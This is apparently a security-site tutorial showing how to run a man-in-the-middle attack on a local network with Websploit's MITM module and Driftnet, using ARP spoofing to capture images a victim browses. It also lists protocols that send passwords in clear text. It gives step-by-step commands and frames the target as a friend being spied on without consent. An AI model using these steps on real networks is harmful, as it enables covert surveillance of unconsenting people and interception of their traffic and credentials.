Thursday, March 28, 2024

Driftnet – Tool used to Capture Images that Your Friend looking at Online

How we can launch a MITM attack with Websploit and the Driftnet – Tool used to capture images.

MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.

Step 1: Need to install websploit in Kali if not present.

root@kali:~# apt-get install websploit

Step2: To Run the websploit

root@kali:~# websploit

Step 3: Next we need to list the modules with the websploit.

wsf > show modules

Driftnet - Tool used to capture images

Step 4: Need to select network/mitm under Network modules.

wsf > use network/mitm
wsf:MITM > show options

Driftnet - Tool used to capture images

Interface: Need to specify the network adapter interface based on our network adapter.

  • set Interface eth0
  • set Interface wlan0

Router: Need to specify Router IP, which can be found with the command route -n.

set Router (Gateway IP)

Target: The victim machine IP address, can be found with ipconfig for Windows and ifconfig for Linux.

Driftnet - Tool used to capture images

Step 5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occur after that sniffers will start up.

wsf:MITM > run

Driftnet - Tool used to capture images

Step 6: Now go down to the victim machine and start surfing, all the images would be captured by drifnet.

Driftnet - Tool used to capture images

Here you can find the pictures that your friend watching online.

Protocols Vulnerable to Sniffing

  • HTTP: Sends passwords in clear text
  • TELNET: Transfer commands in plain text
  • SNMP: Sends passwords in clear text
  • POP: Sends passwords in clear text
  • FTP: Sends passwords in clear text
  • NNTP: Sends passwords in clear text
  • IMAP: Sends passwords in clear text

If you have any doubt please don’t hesitate to leave a comment.

Also, find more Tutorials with Kali Linux

Website

Latest articles

GoPlus’s Latest Report Highlights How Blockchain Communities Are Leveraging Critical API Security Data To Mitigate Web3 Threats

GoPlus Labs, the leading Web3 security infrastructure provider, has unveiled a groundbreaking report highlighting...

Wireshark 4.2.4 Released: What’s New!

Wireshark stands as the undisputed leader, offering unparalleled tools for troubleshooting, analysis, development, and...

Zoom Unveils AI-Powered All-In-One AI Work Workplace

Zoom has taken a monumental leap forward by introducing Zoom Workplace, an all-encompassing AI-powered...

iPhone Users Beware! Darcula Phishing Service Attacking Via iMessage

Phishing allows hackers to exploit human vulnerabilities and trick users into revealing sensitive information...

2 Chrome Zero-Days Exploited at Pwn2Own 2024: Patch Now

Google has announced a crucial update to its Chrome browser, addressing several vulnerabilities, including...

The Moon Malware Hacked 6,000 ASUS Routers in 72hours to Use for Proxy

Black Lotus Labs discovered a multi-year campaign by TheMoon malware targeting vulnerable routers and...
Guru baran
Guru baranhttps://gbhackers.com
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles